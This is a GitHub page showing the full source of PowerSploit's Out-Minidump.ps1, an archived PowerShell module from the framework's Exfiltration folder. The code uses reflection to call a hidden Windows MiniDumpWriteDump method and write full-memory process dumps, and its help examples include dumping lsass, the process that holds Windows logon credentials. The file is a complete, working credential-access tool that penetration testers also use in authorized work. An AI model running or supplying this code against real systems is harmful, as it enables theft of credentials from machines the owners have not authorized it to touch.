This repository has been archived by the owner on Jan 21, 2021. It is now read-only.
Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
PowerSploit/Exfiltration/Out-Minidump.ps1
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
130 lines (94 sloc)
3.53 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Out-Minidump | |
| { | |
| <# | |
| .SYNOPSIS | |
| Generates a full-memory minidump of a process. | |
| PowerSploit Function: Out-Minidump | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| .DESCRIPTION | |
| Out-Minidump writes a process dump file with all process memory to disk. | |
| This is similar to running procdump.exe with the '-ma' switch. | |
| .PARAMETER Process | |
| Specifies the process for which a dump will be generated. The process object | |
| is obtained with Get-Process. | |
| .PARAMETER DumpFilePath | |
| Specifies the path where dump files will be written. By default, dump files | |
| are written to the current working directory. Dump file names take following | |
| form: processname_id.dmp | |
| .EXAMPLE | |
| Out-Minidump -Process (Get-Process -Id 4293) | |
| Description | |
| ----------- | |
| Generate a minidump for process ID 4293. | |
| .EXAMPLE | |
| Get-Process lsass | Out-Minidump | |
| Description | |
| ----------- | |
| Generate a minidump for the lsass process. Note: To dump lsass, you must be | |
| running from an elevated prompt. | |
| .EXAMPLE | |
| Get-Process | Out-Minidump -DumpFilePath C:\temp | |
| Description | |
| ----------- | |
| Generate a minidump of all running processes and save them to C:\temp. | |
| .INPUTS | |
| System.Diagnostics.Process | |
| You can pipe a process object to Out-Minidump. | |
| .OUTPUTS | |
| System.IO.FileInfo | |
| .LINK | |
| http://www.exploit-monday.com/ | |
| #> | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] | |
| [System.Diagnostics.Process] | |
| $Process, | |
| [Parameter(Position = 1)] | |
| [ValidateScript({ Test-Path $_ })] | |
| [String] | |
| $DumpFilePath = $PWD | |
| ) | |
| BEGIN | |
| { | |
| $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') | |
| $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') | |
| $Flags = [Reflection.BindingFlags] 'NonPublic, Static' | |
| $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) | |
| $MiniDumpWithFullMemory = [UInt32] 2 | |
| } | |
| PROCESS | |
| { | |
| $ProcessId = $Process.Id | |
| $ProcessName = $Process.Name | |
| $ProcessHandle = $Process.Handle | |
| $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" | |
| $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName | |
| $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) | |
| $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, | |
| $ProcessId, | |
| $FileStream.SafeFileHandle, | |
| $MiniDumpWithFullMemory, | |
| [IntPtr]::Zero, | |
| [IntPtr]::Zero, | |
| [IntPtr]::Zero)) | |
| $FileStream.Close() | |
| if (-not $Result) | |
| { | |
| $Exception = New-Object ComponentModel.Win32Exception | |
| $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" | |
| # Remove any partially written dump files. For example, a partial dump will be written | |
| # in the case when 32-bit PowerShell tries to dump a 64-bit process. | |
| Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue | |
| throw $ExceptionMessage | |
| } | |
| else | |
| { | |
| Get-ChildItem $ProcessDumpPath | |
| } | |
| } | |
| END {} | |
| } |